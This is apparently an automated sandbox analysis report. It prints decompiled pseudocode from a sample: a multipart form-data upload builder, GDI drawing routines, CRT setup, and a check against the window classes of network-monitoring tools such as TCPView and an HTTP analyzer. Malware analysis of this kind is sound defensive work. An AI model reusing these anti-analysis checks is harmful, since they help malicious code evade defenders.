Uniqueness Score: -1.00%

Function 10019F30, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68cc0d9f7c837baba5d84efb1518d219cd5a9d155d3a346d5a5021a63293fcbc
Instruction ID: afa243e2bbc7d5b73eef9c76600441106c915adb5c9f305da66005335667999b
Opcode Fuzzy Hash: 68cc0d9f7c837baba5d84efb1518d219cd5a9d155d3a346d5a5021a63293fcbc
Instruction Fuzzy Hash: FCD0A92059D2CC6ECB02CBB88411BA9BFF88716600F0802C4E888C3382C02A820983A1

Uniqueness

Uniqueness Score: -1.00%

Function 100215A0, Relevance: 48.4, APIs: 32, Instructions: 449
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E100215A0(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36) {
				char _v8;
				intOrPtr _v16;
				char* _v20;
				char _v24;
				char _v28;
				char _v543;
				char _v544;
				char _v807;
				char _v808;
				char* _v812;
				char _v1079;
				char _v1080;
				char* _v1084;
				char* _v1088;
				char _v1599;
				char _v1600;
				intOrPtr _v1604;
				char _v15703;
				char _v15704;
				char* _v15708;
				char _v29807;
				char _v29808;
				char* _v29812;
				char _v43911;
				char _v43912;
				char _v58007;
				char _v58008;
				char _v58024;
				char _v58052;
				char _v58080;
				char _v58084;
				void* __esi;
				void* _t172;
				intOrPtr _t179;
				void* _t186;
				void* _t195;
				void* _t216;
				void* _t218;
				void* _t237;
				void* _t254;
				intOrPtr _t297;
				intOrPtr _t357;
				void* _t359;
				void* _t366;
				void* _t376;
				void* _t385;
				void* _t392;

				_t353 = __edi;
				_t265 = __ebx;
				_push(0xffffffff);
				_push(E100231DA);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t357;
				E10018B00(0xe2d4);
				_push(_t354);
				_v24 = 0;
				_v28 = "--";
				if(_a16 != 0 && _a20 != 0 && _a24 != 0 && _a28 != 0 && _a32 > 0) {
					_v812 = "Content-Disposition: form-data; name=\"%s\"; %s=\"%s\"";
					_v1084 = "Content-Type: %s";
					_v1088 = "%s%s\r\n%s\r\n%s\r\n\r\n";
					_v808 = 0;
					E1000CF80(__edi,  &_v807, 0, 0x103);
					_v1080 = 0;
					E1000CF80(_t353,  &_v1079, 0, 0x103);
					_v1600 = 0;
					E1000CF80(_t353,  &_v1599, 0, 0x1ff);
					_push(_a20);
					_push(_a16);
					E1000CCA3(_t353,  &_v808, _v812, _a16);
					E1000CCA3(_t353,  &_v1080, _v1084, _a24);
					_push( &_v1080);
					_push( &_v808);
					_push(_a4);
					E1000CCA3(_t353,  &_v1600, _v1088, _v28);
					_t392 = _t357 + 0x5c;
					if( *_a36 != 0) {
						E1000D1F0(__ebx, _t353, _t354,  *_a36 + _v24,  &_v1600, E1000CAD0( &_v1600));
						_t392 = _t392 + 0x10;
					}
					_t254 = E1000CAD0( &_v1600);
					_t357 = _t392 + 4;
					_v24 = _t254 + _v24;
					if( *_a36 != 0) {
						E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24, _a28, _a32);
						_t357 = _t357 + 0xc;
					}
					_v24 = _v24 + _a32;
				}
				if(_a8 != 0 && _a12 > 0) {
					_t172 = E10001A50(_a8, "=");
					_t357 = _t357 + 8;
					if(_t172 != 0) {
						_v15708 = "Content-Disposition: form-data; name=\"%s\"";
						_v29812 = "\r\n%s%s\r\n%s\r\n\r\n%s";
						_v58008 = 0;
						E1000CF80(_t353,  &_v58007, 0, 0x370f);
						_v29808 = 0;
						E1000CF80(_t353,  &_v29807, 0, 0x370f);
						_v43912 = 0;
						E1000CF80(_t353,  &_v43911, 0, 0x370f);
						_v15704 = 0;
						E1000CF80(_t353,  &_v15703, 0, 0x370f);
						_t179 = E10001A50(_a8, "&");
						_t366 = _t357 + 0x38;
						_v1604 = _t179;
						if(_v1604 != 0) {
							E10001160( &_v58052, __eflags, _a8);
							_v8 = 0;
							E10003060( &_v58024, __eflags);
							_v8 = 1;
							E10001160( &_v58080, __eflags, "&");
							_v8 = 2;
							E1001A8B0(__eflags,  &_v58052,  &_v58024,  &_v58080);
							_t357 = _t366 + 0xc;
							_v58084 = 0;
							while(1) {
								_t186 = E10002270( &_v58024);
								__eflags = _v58084 - _t186;
								if(_v58084 >= _t186) {
									break;
								}
								E1000CF80(_t353,  &_v43912, 0, 0x3710);
								E1000CF80(_t353,  &_v15704, 0, 0x3710);
								_t195 = E10001A50(E100011E0(E100030B0( &_v58024, __eflags, _v58084)), "=");
								_t354 = _t195 - E100011E0(E100030B0( &_v58024, __eflags, _v58084));
								E1000D1F0(_t265, _t353, _t195 - E100011E0(E100030B0( &_v58024, __eflags, _v58084)),  &_v43912, E100011E0(E100030B0( &_v58024, __eflags, _v58084)), _t195 - E100011E0(E100030B0( &_v58024, __eflags, _v58084)));
								E1000D903(_v58084,  &_v15704, 0x3710, E10001A50(E100011E0(E100030B0( &_v58024, __eflags, _v58084)), "=") + 1);
								E1000CF80(_t353,  &_v58008, 0, 0x3710);
								E1000CF80(_t353,  &_v29808, 0, 0x3710);
								E1000CCA3(_t353,  &_v58008, _v15708,  &_v43912);
								_push( &_v15704);
								_push( &_v58008);
								_push(_a4);
								E1000CCA3(_t353,  &_v29808, _v29812, _v28);
								_t376 = _t357 + 0x7c;
								__eflags =  *_a36;
								if( *_a36 != 0) {
									_t218 = E1000CAD0( &_v29808);
									__eflags =  *_a36 + _v24;
									E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, _t218);
									_t376 = _t376 + 0x10;
								}
								_t216 = E1000CAD0( &_v29808);
								_t357 = _t376 + 4;
								_v24 = _t216 + _v24;
								_t297 = _v58084 + 1;
								__eflags = _t297;
								_v58084 = _t297;
							}
							_v8 = 1;
							E100011A0( &_v58080);
							_v8 = 0;
							E10003090( &_v58024);
							_v8 = 0xffffffff;
							E100011A0( &_v58052);
						} else {
							E1000D1F0(_t265, _t353, _t354,  &_v43912, _a8, E10001A50(_a8, "=") - _a8);
							E1000D903(_a8,  &_v15704, 0x3710, E10001A50(_a8, "=") + 1);
							E1000CF80(_t353,  &_v58008, 0, 0x3710);
							E1000CF80(_t353,  &_v29808, 0, 0x3710);
							E1000CCA3(_t353,  &_v58008, _v15708,  &_v43912);
							_push( &_v15704);
							_push( &_v58008);
							_push(_a4);
							E1000CCA3(_t353,  &_v29808, _v29812, _v28);
							_t385 = _t366 + 0x64;
							if( *_a36 != 0) {
								E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, E1000CAD0( &_v29808));
								_t385 = _t385 + 0x10;
							}
							_t237 = E1000CAD0( &_v29808);
							_t357 = _t385 + 4;
							_v24 = _t237 + _v24;
						}
					}
				}
				_v20 = "\r\n%s%s%s\r\n";
				_v544 = 0;
				E1000CF80(_t353,  &_v543, 0, 0x1ff);
				_push(_v28);
				_push(_a4);
				E1000CCA3(_t353,  &_v544, _v20, _v28);
				_t359 = _t357 + 0x20;
				if( *_a36 != 0) {
					E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24,  &_v544, E1000CAD0( &_v544));
					_t359 = _t359 + 0x10;
				}
				_v24 = E1000CAD0( &_v544) + _v24;
				 *[fs:0x0] = _v16;
				return _v24;
			}

0x100215a0
0x100215a0
0x100215a3
0x100215a5
0x100215b0
0x100215b1
0x100215bd
0x100215c2
0x100215c3
0x100215ca
0x100215d5
0x10021603
0x1002160d
0x10021617
0x10021621
0x10021636
0x1002163e
0x10021653
0x1002165b
0x10021670
0x1002167b
0x1002167f
0x10021692
0x100216ac
0x100216ba
0x100216c1
0x100216c5
0x100216d8
0x100216dd
0x100216e6
0x10021708
0x1002170d
0x1002170d
0x10021717
0x1002171c
0x10021722
0x1002172b
0x1002173e
0x10021743
0x10021743
0x1002174c
0x1002174c
0x10021753
0x1002176c
0x10021771
0x10021776
0x1002177c
0x10021786
0x10021790
0x100217a5
0x100217ad
0x100217c2
0x100217ca
0x100217df
0x100217e7
0x100217fc
0x1002180d
0x10021812
0x10021815
0x10021822
0x10021942
0x10021947
0x10021954
0x10021959
0x10021968
0x1002196d
0x10021986
0x1002198b
0x1002198e
0x100219a9
0x100219af
0x100219b4
0x100219ba
0x00000000
0x00000000
0x100219ce
0x100219e4
0x10021a0b
0x10021a2e
0x10021a52
0x10021a91
0x10021aa7
0x10021abd
0x10021ada
0x10021ae8
0x10021aef
0x10021af3
0x10021b06
0x10021b0b
0x10021b11
0x10021b14
0x10021b1d
0x10021b32
0x10021b36
0x10021b3b
0x10021b3b
0x10021b45
0x10021b4a
0x10021b50
0x100219a0
0x100219a0
0x100219a3
0x100219a3
0x10021b58
0x10021b62
0x10021b67
0x10021b71
0x10021b76
0x10021b83
0x10021828
0x10021848
0x10021871
0x10021887
0x1002189d
0x100218ba
0x100218c8
0x100218cf
0x100218d3
0x100218e6
0x100218eb
0x100218f4
0x10021916
0x1002191b
0x1002191b
0x10021925
0x1002192a
0x10021930
0x10021930
0x10021822
0x10021776
0x10021b88
0x10021b8f
0x10021ba4
0x10021baf
0x10021bb3
0x10021bc3
0x10021bc8
0x10021bd1
0x10021bf3
0x10021bf8
0x10021bf8
0x10021c0d
0x10021c16
0x10021c21

APIs

_memset.LIBCMT ref: 10021636
_memset.LIBCMT ref: 10021653
_memset.LIBCMT ref: 10021670
_sprintf.LIBCMT ref: 10021692
_strlen.LIBCMT ref: 100216EF
_strlen.LIBCMT ref: 10021717
_sprintf.LIBCMT ref: 100216D8

Part of subcall function 1000CCA3: __flsbuf.LIBCMT ref: 1000CD11

_sprintf.LIBCMT ref: 100216AC

Part of subcall function 1000CCA3: __output_l.LIBCMT ref: 1000CCF6

_memset.LIBCMT ref: 100217A5
_memset.LIBCMT ref: 100217C2
_memset.LIBCMT ref: 100217DF
_memset.LIBCMT ref: 100217FC
_strcpy_s.LIBCMT ref: 10021871
_memset.LIBCMT ref: 10021887
_memset.LIBCMT ref: 1002189D
_sprintf.LIBCMT ref: 100218BA
_sprintf.LIBCMT ref: 100218E6
_strlen.LIBCMT ref: 100218FD
_strlen.LIBCMT ref: 10021925
_memset.LIBCMT ref: 100219CE
_memset.LIBCMT ref: 100219E4
_strcpy_s.LIBCMT ref: 10021A91
_memset.LIBCMT ref: 10021AA7
_memset.LIBCMT ref: 10021ABD
_memset.LIBCMT ref: 10021BA4
_sprintf.LIBCMT ref: 10021BC3
_strlen.LIBCMT ref: 10021BDA
_strlen.LIBCMT ref: 10021C02

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$_sprintf_strlen$_strcpy_s$__flsbuf__output_l
String ID:
API String ID: 854390245-0
Opcode ID: 32f6cbe5084832234cf5b37318cbf1dc11104bf1af1b1b208e41874a49aca06a
Instruction ID: cf3fdb6315e205635e4887c8713e315fd67cdd6efcc5cedbeed1e245040bfa00
Opcode Fuzzy Hash: 32f6cbe5084832234cf5b37318cbf1dc11104bf1af1b1b208e41874a49aca06a
Instruction Fuzzy Hash: F50292B6D00208ABDB10DB54DC82FDE777CEB58244F444598F509A7285EB75BB88CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00401390, Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 242
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00401390(signed long long __fp0) {
				void* _t79;
				signed long long _t87;
				signed char _t88;
				signed long long _t89;
				int _t94;
				int _t97;
				int _t115;
				int _t118;
				int _t127;
				int _t142;
				signed char _t156;
				void* _t159;
				struct HDC__* _t162;
				signed long long _t163;
				signed long long* _t164;
				signed long long* _t165;
				long long* _t166;

				_t172 = __fp0;
				_t163 = _t164[0x17];
				_t162 = _t164[0x18];
				_t79 = SelectObject(_t162,  *(_t163 + 0x18));
				_t127 =  *(_t163 + 0x20);
				_t164[5] = _t79;
				_t164[7] = SelectObject(_t162, _t127);
				_t164[7] = SelectObject(_t162, GetStockObject(8));
				SetBkMode(_t162, 1);
				SetTextColor(_t162, 0);
				_t164[3] = 0x19;
				_t164[3] = 0x96;
				_t164[4] = 0xaf;
				_t164[4] = 0xa7;
				_t142 = _t163 + 0x84;
				if( *((intOrPtr*)(_t163 + 0x28)) != 0) {
					_t164[2] = _t142;
					_t164[5] = 8;
					do {
						_t87 =  *(_t164[2]);
						_t164[6] = _t87;
						if(_t87 <= 1) {
							_t164[2] = 0xc3140000;
						} else {
							asm("fild dword [esp+0x34]");
							asm("fldlg2");
							asm("fxch st0, st1");
							asm("fyl2x");
							_t164[2] = _t172 *  *0x40b200 *  *0x40b1f8;
						}
						_t88 = E00403774();
						_t156 = _t88;
						if(_t156 >= 0) {
							if(_t156 <= 0x96) {
								if(_t156 > 0) {
									goto L17;
								}
							} else {
								_t156 = 0x96;
								L17:
								SelectObject(_t162,  *(_t163 + 0x24));
								_t52 = _t164[3] + 1; // 0x1
								_t127 = _t156 + _t52;
								_t88 = Rectangle(_t162, _t164[3], _t164[4], _t127, _t164[4]);
							}
							if(_t156 < 0x96) {
								goto L19;
							}
						} else {
							_t156 = 0;
							L19:
							SelectObject(_t162,  *(_t163 + 0x20));
							_t127 = _t164[3];
							_t88 = Rectangle(_t162, _t156 + _t127, _t164[3], _t164[4] + 1, _t164[4]);
						}
						_t172 = _t164[2];
						asm("fcomp dword [0x40b1ec]");
						asm("fnstsw ax");
						if((_t88 & 0x00000041) != 0) {
							_t89 = "-inf db"; // 0x666e692d
							_t127 =  *0x40d1d4; // 0x626420
							_t164[7] = _t89;
							_t164[8] = _t127;
						} else {
							_t172 = _t164[2];
							_t165 = _t164 - 8;
							 *_t165 = _t172;
							_push("%0.1f db");
							_push( &(_t165[8]));
							E004036D0( &(_t165[8]));
							_t164 =  &(_t165[2]);
						}
						asm("repne scasb");
						DrawTextA(_t162,  &(_t164[8]),  !(_t127 | 0xffffffff) - 1,  &(_t164[3]), 0x25);
						_t94 = _t164[3] + 0x11;
						_t127 = _t164[2] + 4;
						_t164[3] = _t94;
						_t164[4] = _t94 + 0x11;
						_t97 = _t164[5] - 1;
						_t164[2] = _t127;
						_t164[5] = _t97;
					} while (_t97 != 0);
				} else {
					_t164[2] = _t142;
					_t164[5] = 8;
					do {
						asm("fild dword [eax]");
						asm("fst dword [esp+0x14]");
						_t159 = E00403774();
						if(_t159 > 0) {
							SelectObject(_t162,  *(_t163 + 0x24));
							_t22 = _t164[3] + 1; // 0x1
							_t127 = _t159 + _t22;
							Rectangle(_t162, _t164[3], _t164[4], _t127, _t164[4]);
						}
						if(_t159 < 0x96) {
							SelectObject(_t162,  *(_t163 + 0x20));
							_t127 = _t164[3];
							Rectangle(_t162, _t159 + _t127, _t164[3], _t164[4] + 1, _t164[4]);
						}
						_t172 = _t164[2];
						_t166 = _t164 - 8;
						 *_t166 = _t164[2];
						_push("%0.1f %%");
						_push(_t166 + 0x44);
						E004036D0(_t166 + 0x44);
						_t164 = _t166 + 0x10;
						asm("repne scasb");
						DrawTextA(_t162,  &(_t164[9]),  !(_t127 | 0xffffffff) - 1,  &(_t164[3]), 0x25);
						_t115 = _t164[3] + 0x11;
						_t127 = _t164[2] + 4;
						_t164[3] = _t115;
						_t164[4] = _t115 + 0x11;
						_t118 = _t164[5] - 1;
						_t164[2] = _t127;
						_t164[5] = _t118;
					} while (_t118 != 0);
				}
				SelectObject(_t162, _t164[5]);
				SelectObject(_t162, _t164[7]);
				return SelectObject(_t162, _t164[6]);
			}

0x00401390
0x0040139e
0x004013a6
0x004013b3
0x004013b5
0x004013b8
0x004013c5
0x004013d7
0x004013db
0x004013e4
0x004013ed
0x004013f7
0x004013ff
0x00401407
0x0040140f
0x00401415
0x00401502
0x00401506
0x0040150a
0x0040150e
0x00401513
0x00401517
0x00401535
0x00401519
0x00401519
0x00401523
0x00401525
0x00401527
0x0040152f
0x0040152f
0x0040154d
0x00401552
0x00401556
0x00401562
0x0040156d
0x00000000
0x00000000
0x00401564
0x00401564
0x0040156f
0x00401574
0x00401583
0x00401583
0x0040158b
0x0040158b
0x00401597
0x00000000
0x00000000
0x00401558
0x00401558
0x00401599
0x0040159e
0x004015ad
0x004015b8
0x004015b8
0x004015be
0x004015c2
0x004015c8
0x004015cd
0x004015ed
0x004015f2
0x004015f8
0x004015fc
0x004015cf
0x004015cf
0x004015d3
0x004015da
0x004015dd
0x004015e2
0x004015e3
0x004015e8
0x004015e8
0x0040160d
0x0040161c
0x0040162a
0x0040162d
0x00401630
0x00401637
0x0040163f
0x00401640
0x00401644
0x00401644
0x0040141b
0x0040141b
0x0040141f
0x00401423
0x00401427
0x0040142f
0x0040143e
0x00401442
0x00401449
0x00401458
0x00401458
0x00401460
0x00401460
0x0040146c
0x00401473
0x00401482
0x0040148d
0x0040148d
0x00401493
0x00401497
0x0040149e
0x004014a1
0x004014a6
0x004014a7
0x004014ac
0x004014bf
0x004014cb
0x004014d9
0x004014dc
0x004014df
0x004014e6
0x004014ee
0x004014ef
0x004014f3
0x004014f3
0x004014fd
0x00401654
0x0040165c
0x00401670

APIs

SelectObject.GDI32(?,?), ref: 004013B3
SelectObject.GDI32(?,?), ref: 004013BE
GetStockObject.GDI32(00000008), ref: 004013CA
SelectObject.GDI32(?,00000000), ref: 004013D2
SetBkMode.GDI32(?,00000001), ref: 004013DB
SetTextColor.GDI32(?,00000000), ref: 004013E4
__ftol.LIBCMT ref: 00401439
SelectObject.GDI32(?,?), ref: 00401449
Rectangle.GDI32(?,00000019,000000AF,00000001,?), ref: 00401460
SelectObject.GDI32(?,?), ref: 00401473
Rectangle.GDI32(?,00000000,?,000000B0,?), ref: 0040148D
DrawTextA.USER32(?,?,?,?,00000025), ref: 004014CB
__ftol.LIBCMT ref: 0040154D
SelectObject.GDI32(?,?), ref: 00401574
Rectangle.GDI32(?,00000019,000000AF,00000001,?), ref: 0040158B
SelectObject.GDI32(?,?), ref: 0040159E
Rectangle.GDI32(?,00000000,?,000000B0,?), ref: 004015B8
DrawTextA.USER32(?,?,0062641F,00000019,00000025), ref: 0040161C
SelectObject.GDI32(?,?), ref: 00401654
SelectObject.GDI32(?,?), ref: 0040165C
SelectObject.GDI32(?,?), ref: 00401664

Strings

%0.1f %%, xrefs: 004014A1
%0.1f db, xrefs: 004015DD
-inf db, xrefs: 004015ED

Memory Dump Source

Source File: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Select$Rectangle$Text$Draw__ftol$ColorModeStock
String ID: %0.1f %%$%0.1f db$-inf db
API String ID: 1744867341-3832817206
Opcode ID: 520a7b3b37642a0fdd8d1bba43b2d9cb07e742f30a0f0afb5f0929533602d730
Instruction ID: a77257ee316fdba333d06e361e7088ec18a0b998c7069467a8efb2542bb6b01f
Opcode Fuzzy Hash: 520a7b3b37642a0fdd8d1bba43b2d9cb07e742f30a0f0afb5f0929533602d730
Instruction Fuzzy Hash: 2F813AB1508701AFD300DF15DD8596FB7E9FBC8304F404A2DF595A72A0DB78E9058B9A

Uniqueness

Uniqueness Score: -1.00%

Function 10011936, Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E10011936(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x10335478 = GetProcAddress(_t37, "FlsAlloc");
					 *0x1033547c = GetProcAddress(_t37, "FlsGetValue");
					 *0x10335480 = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x10335478;
					_t40 = TlsSetValue;
					 *0x10335484 = _t7;
					if( *0x10335478 == 0) {
						L6:
						 *0x1033547c = TlsGetValue;
						 *0x10335478 = E100115ED;
						 *0x10335480 = _t40;
						 *0x10335484 = TlsFree;
					} else {
						__eflags =  *0x1033547c;
						if( *0x1033547c == 0) {
							goto L6;
						} else {
							__eflags =  *0x10335480;
							if( *0x10335480 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x10334594 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x1033547c);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E10011D56();
							 *0x10335478 = E1001151E( *0x10335478);
							 *0x1033547c = E1001151E( *0x1033547c);
							 *0x10335480 = E1001151E( *0x10335480);
							 *0x10335484 = E1001151E( *0x10335484);
							_t18 = E1000F8ED();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E10011620();
								goto L15;
							} else {
								_push(L100117AC);
								_t21 =  *((intOrPtr*)(E1001158A( *0x10335478)))();
								__eflags = _t21 - 0xffffffff;
								 *0x10334590 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E10014911(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x10334590);
										__eflags =  *((intOrPtr*)(E1001158A( *0x10335480)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E1001165D(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E10011620();
					return 0;
				}
			}

0x10011936
0x10011942
0x10011946
0x10011966
0x10011973
0x10011980
0x10011985
0x10011987
0x1001198e
0x10011994
0x10011999
0x100119b1
0x100119b6
0x100119c0
0x100119ca
0x100119d0
0x1001199b
0x1001199b
0x100119a2
0x00000000
0x100119a4
0x100119a4
0x100119ab
0x00000000
0x100119ad
0x100119ad
0x100119af
0x00000000
0x00000000
0x100119af
0x100119ab
0x100119a2
0x100119d5
0x100119db
0x100119de
0x100119e3
0x10011ab5
0x10011ab5
0x10011ab5
0x100119e9
0x100119f0
0x100119f2
0x100119f4
0x00000000
0x100119fa
0x100119fa
0x10011a10
0x10011a20
0x10011a30
0x10011a3d
0x10011a42
0x10011a47
0x10011a49
0x10011ab0
0x10011ab0
0x00000000
0x10011a4b
0x10011a4b
0x10011a5c
0x10011a5e
0x10011a61
0x10011a66
0x00000000
0x10011a68
0x10011a74
0x10011a76
0x10011a7a
0x00000000
0x10011a7c
0x10011a7c
0x10011a7d
0x10011a91
0x10011a93
0x00000000
0x10011a95
0x10011a95
0x10011a97
0x10011a98
0x10011a9f
0x10011aa5
0x10011aa9
0x10011aad
0x10011aad
0x10011a93
0x10011a7a
0x10011a66
0x10011a49
0x100119f4
0x10011ab9
0x10011948
0x10011948
0x10011950
0x10011950

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,1000EA1D), ref: 1001193C
__mtterm.LIBCMT ref: 10011948

Part of subcall function 10011620: __decode_pointer.LIBCMT ref: 10011631
Part of subcall function 10011620: TlsFree.KERNEL32(0000001D,10011AB5), ref: 1001164B

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1001195E
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 1001196B
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10011978
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10011985
TlsAlloc.KERNEL32 ref: 100119D5
TlsSetValue.KERNEL32(00000000), ref: 100119F0
__init_pointers.LIBCMT ref: 100119FA
__encode_pointer.LIBCMT ref: 10011A05
__encode_pointer.LIBCMT ref: 10011A15
__encode_pointer.LIBCMT ref: 10011A25
__encode_pointer.LIBCMT ref: 10011A35
__decode_pointer.LIBCMT ref: 10011A56
__calloc_crt.LIBCMT ref: 10011A6F
__decode_pointer.LIBCMT ref: 10011A89
__initptd.LIBCMT ref: 10011A98
GetCurrentThreadId.KERNEL32 ref: 10011A9F

Strings

FlsSetValue, xrefs: 1001196D
FlsAlloc, xrefs: 10011958
FlsFree, xrefs: 1001197A
FlsGetValue, xrefs: 10011960
KERNEL32.DLL, xrefs: 10011937

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 2657569430-3819984048
Opcode ID: 93fa50452aaafecd530976381e4c398f97edee3f3156b12a78c3b9aad9b59f54
Instruction ID: 808ad0af3f4b6be62188e372f3d3457f3cdf16e918fc8b475f3418519981f6d4
Opcode Fuzzy Hash: 93fa50452aaafecd530976381e4c398f97edee3f3156b12a78c3b9aad9b59f54
Instruction Fuzzy Hash: 16318F358042219AE709EF76ACC56893AB9EB84296F52062AF569DF1E3DF31D4C09B10

Uniqueness

Uniqueness Score: -1.00%

Function 10019430, Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10019430(void* __ebx, void* __edi, void* __eflags, struct HWND__* _a4) {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				void* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t48;
				void* _t51;
				void* _t53;
				void* _t55;
				void* _t57;
				void* _t61;
				void* _t66;
				void* _t88;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;

				_t87 = __edi;
				_t70 = __ebx;
				_v532 = 0;
				E1000CF80(__edi,  &_v531, 0, 0x103);
				_v268 = 0;
				E1000CF80(_t87,  &_v267, 0, 0x103);
				GetClassNameA(_a4,  &_v532, 0x104);
				GetWindowTextA(_a4,  &_v268, 0x104);
				_t35 = E1000CAD0( &_v532);
				_t91 = _t88 + 0x1c;
				_t108 = _t35;
				if(_t35 <= 0) {
					L30:
					return 1;
				}
				_t37 = E10019390(__ebx, _t87, _t108,  &_v532, "Afx:400000:8:10003:0:");
				_t92 = _t91 + 8;
				if(_t37 == 0) {
					_t38 = E10019390(__ebx, _t87, __eflags,  &_v532, "TCPViewClass");
					_t93 = _t92 + 8;
					__eflags = _t38;
					if(__eflags == 0) {
						_t39 = E10019390(__ebx, _t87, __eflags,  &_v532, "TStdHttpAnalyzerForm");
						_t94 = _t93 + 8;
						__eflags = _t39;
						if(__eflags == 0) {
							_t41 = E10019390(_t70, _t87, __eflags,  &_v532, "gdkWindowToplevel");
							_t95 = _t94 + 8;
							__eflags = _t41;
							if(__eflags == 0) {
								_t42 = E10019390(_t70, _t87, __eflags,  &_v532, "XTPMainFrame");
								_t96 = _t95 + 8;
								__eflags = _t42;
								if(_t42 == 0) {
									_t43 = E1000CAD0( &_v268);
									_t97 = _t96 + 4;
									__eflags = _t43;
									if(__eflags <= 0) {
										L20:
										_t45 = E1000CAD0( &_v268);
										_t98 = _t97 + 4;
										__eflags = _t45;
										if(__eflags <= 0) {
											L23:
											_t46 = E10019390(_t70, _t87, __eflags,  &_v532, "SunAwtFrame");
											_t99 = _t98 + 8;
											__eflags = _t46;
											if(_t46 == 0) {
												goto L30;
											}
											_t48 = E1000CAD0( &_v268);
											_t100 = _t99 + 4;
											__eflags = _t48;
